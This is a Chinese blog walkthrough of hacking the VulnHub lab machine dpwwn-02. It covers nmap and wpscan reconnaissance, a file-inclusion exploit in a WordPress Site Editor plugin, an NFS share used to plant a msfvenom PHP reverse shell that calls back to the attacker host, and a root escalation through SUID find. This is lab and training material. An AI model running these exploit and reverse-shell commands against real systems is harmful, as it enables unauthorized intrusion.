vulnhub之dpwwn-02的实践

  • A+
所属分类:安全文章

本周末实践的是vulnhub的dpwwn-02镜像,这个镜像稍微复杂一些,

下载地址,https://download.vulnhub.com/dpwwn/dpwwn-02.zip,

解压后一看就是vmware的虚机,当然就用workstation打开,

启动靶机,从console上没有看到ip地址,还是得自己去扫,但是没扫到,

注意到镜像网站上的说明,镜像的地址被写死成10.10.10.10了,

vulnhub之dpwwn-02的实践

就把本地kali攻击机也改成跟靶机同一个网络,就能通了,直接端口扫描,

sudo nmap -sS -sV -T5 -A -p- 10.10.10.10,

vulnhub之dpwwn-02的实践

发现有web服务,接着来个目录爆破,sudo dirb http://10.10.10.10,

vulnhub之dpwwn-02的实践

看到是wordpress,就再来个针对性的扫描,

sudo wpscan --url http://10.10.10.10/wordpress -e p,

vulnhub之dpwwn-02的实践

看到有个插件site-editor,对其进行漏洞利用搜索,

searchsploit site editor 1.1.1,

vulnhub之dpwwn-02的实践

看到一个文件包含漏洞,查看详细说明,

cat /usr/share/exploitdb/exploits/php/webapps/44340.txt,

vulnhub之dpwwn-02的实践

知道了漏洞利用的url,先尝试http://10.10.10.10/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd,发现不对,改成http://10.10.10.10/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd,就对了,

vulnhub之dpwwn-02的实践

记得之前端口扫描的结果里有nfs服务,首先查看共享路径,

showmount --exports 10.10.10.10,

创建本地目录,mkdir dpwwn02,

把靶机的共享路径mount到本地目录,

sudo mount -t nfs 10.10.10.10:/home/dpwwn02 --target dpwwn02,

本地创建一个反弹shell脚本,

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=4444 R > shell.php,

复制到共享路径mount的目录,sudo cp shell.php dpwwn02/,

vulnhub之dpwwn-02的实践

本地再开一个监听,

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 10.10.10.128
exploit

vulnhub之dpwwn-02的实践

用浏览器访问http://10.10.10.10/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/home/dpwwn02/shell.php,

反弹shell就过来了,发现不是root,需要提权,

find / -perm -u=s -type f 2>/dev/null,又有find,哈哈,

vulnhub之dpwwn-02的实践

给bash命令加账户权限,find /home -exec chmod u+s /bin/bash ;

再执行bash命令,就拿到root权限了。

vulnhub之dpwwn-02的实践


本文始发于微信公众号(云计算和网络安全技术实践):vulnhub之dpwwn-02的实践

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: